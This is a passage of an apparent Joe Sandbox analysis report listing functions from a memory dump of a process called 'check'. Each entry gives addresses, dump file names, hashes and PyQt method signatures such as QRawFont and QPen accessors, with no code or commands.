                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_Cursor@@End@FromLongText
                                                                                                                                                                                                                                          • String ID: QTextCursor$atEnd$atEnd(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 2565261672-3784715267
                                                                                                                                                                                                                                          • Opcode ID: 4792d838aaef5f563dc1efcc966a7f8342150eee3d3e551c64ee141a25a9198d
                                                                                                                                                                                                                                          • Instruction ID: f5d3eb1ae7b773071bf4ff13ffa0fa5b2041b420592f98e290b9e4b35b4b2770
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4792d838aaef5f563dc1efcc966a7f8342150eee3d3e551c64ee141a25a9198d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64012C36A09A46C1EB109F61E8496A937E4FB40FD4F914032D99E47320EF7DE569C344
                                                                                                                                                                                                                                          Function 00007FF89D98DAB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?leading@DoubleFloat_Font@@From
                                                                                                                                                                                                                                          • String ID: QRawFont$leading$leading(self) -> float
                                                                                                                                                                                                                                          • API String ID: 617535915-3077518540
                                                                                                                                                                                                                                          • Opcode ID: 7378f0b0bc36ca5fbf9a464e97da6615c4e09b5be7b51091b57ecd517134532f
                                                                                                                                                                                                                                          • Instruction ID: 4f46fc268dd2e8a830c2c388fb9a2ab00cedcf2d83c713407db0640d42c636db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7378f0b0bc36ca5fbf9a464e97da6615c4e09b5be7b51091b57ecd517134532f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9201E136A08A46D1DB10DF51E8496A933A4FB54FD4F914032C99E43320EF7DE959C344
                                                                                                                                                                                                                                          Function 00007FF89D95FEB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?deviceDoubleFloat_FromPixelRatio@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$devicePixelRatio$devicePixelRatio(self) -> float
                                                                                                                                                                                                                                          • API String ID: 3287233405-1767006637
                                                                                                                                                                                                                                          • Opcode ID: a0fe11ddb423bc3d5149061f5343d19de5dbdbc3bcf96ac03c9bda55776493cf
                                                                                                                                                                                                                                          • Instruction ID: 59c79b9cc855b853cf88bee7d4c8a6a270a9830f41587ea7e24eb060124202d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0fe11ddb423bc3d5149061f5343d19de5dbdbc3bcf96ac03c9bda55776493cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A301DA77A08A46C1EB109F51E8496A933A4FB44FD4F914032DA9E43330EF7DEA9AC744
                                                                                                                                                                                                                                          Function 00007FF89D98DE30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_Font@@FromHeight@
                                                                                                                                                                                                                                          • String ID: QRawFont$xHeight$xHeight(self) -> float
                                                                                                                                                                                                                                          • API String ID: 2731889199-1441519863
                                                                                                                                                                                                                                          • Opcode ID: 689d750fa7bf1945dbdf80602c3f03c9c172640ca3a9b92c00c50a6677e3052d
                                                                                                                                                                                                                                          • Instruction ID: 1e529cb2612bc32ccc12663435b6c20ae34c487366c7d6675a698912ae07d4c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 689d750fa7bf1945dbdf80602c3f03c9c172640ca3a9b92c00c50a6677e3052d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC01DE76A08B46D1DB109F51E8496A933A4FB54F94F914032C99E43320EF7DEA59C344
                                                                                                                                                                                                                                          Function 00007FF89D96FA00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?widthDoubleFloat_FromPen@@
                                                                                                                                                                                                                                          • String ID: QPen$widthF$widthF(self) -> float
                                                                                                                                                                                                                                          • API String ID: 64521866-462915029
                                                                                                                                                                                                                                          • Opcode ID: e410f8abd33b05d209969c46bc55700622f8c6b1af2c952791db382e58356e6a
                                                                                                                                                                                                                                          • Instruction ID: 25ebea586b670f0a96244c663b9b9c643bae5d63b0ea64c837c108b04ceafb91
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e410f8abd33b05d209969c46bc55700622f8c6b1af2c952791db382e58356e6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9012132A08A46C1DB109F61E8496A933E4FB50FD4F914032D99E43320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D997E50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?fontDoubleFloat_FromGamma@Hints@@SmoothingStyle
                                                                                                                                                                                                                                          • String ID: QStyleHints$fontSmoothingGamma$fontSmoothingGamma(self) -> float
                                                                                                                                                                                                                                          • API String ID: 3917233285-1432461477
                                                                                                                                                                                                                                          • Opcode ID: 30c9579dd5f32fb26ab30d030fd2d037af56cc8a9190b9240cc6c9ed4e894f9b
                                                                                                                                                                                                                                          • Instruction ID: 35a1f81a66ddc89c09dd192a3bd2b5a2376e14b628144baa851a3f2bd045163c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30c9579dd5f32fb26ab30d030fd2d037af56cc8a9190b9240cc6c9ed4e894f9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601E836A08A46C1EB10DF61E8896A933A4FB44FD5F914032CA9E47330EF7DEA59C344
                                                                                                                                                                                                                                          Function 00007FF89D98E0F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?averageCharDoubleFloat_Font@@FromWidth@
                                                                                                                                                                                                                                          • String ID: QRawFont$averageCharWidth$averageCharWidth(self) -> float
                                                                                                                                                                                                                                          • API String ID: 3445971894-2341270624
                                                                                                                                                                                                                                          • Opcode ID: c151ae17790cb6613f2e6733e4c6ff8cc2a87a67ae0da5890618e6fd65816c24
                                                                                                                                                                                                                                          • Instruction ID: d337b642cd83b6cf782a7f674cc7bb81f710e363f5e72f5e00cca29d34a0162b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c151ae17790cb6613f2e6733e4c6ff8cc2a87a67ae0da5890618e6fd65816c24
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A01E136A08B46D1EB109F51E8496A937A4FB44FD4F914032C99E47320EF7DEA59C348
                                                                                                                                                                                                                                          Function 00007FF89D9560F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?minimumDoubleFloat_FromLayout@@TextWidth@
                                                                                                                                                                                                                                          • String ID: QTextLayout$minimumWidth$minimumWidth(self) -> float
                                                                                                                                                                                                                                          • API String ID: 286786364-1117042158
                                                                                                                                                                                                                                          • Opcode ID: 7906030622871ebfb2a62ac5eabf4fec9e26204c4d4c7305c3a7adf05c16142e
                                                                                                                                                                                                                                          • Instruction ID: 6982f441f9f66d4c719a31480bad433de1592782deb27b8a03d29d1ec1050c11
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7906030622871ebfb2a62ac5eabf4fec9e26204c4d4c7305c3a7adf05c16142e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33012C33A08A46C1EB109F21E8496A933A4FB44FD4F914032DA9E43330EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D9420D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
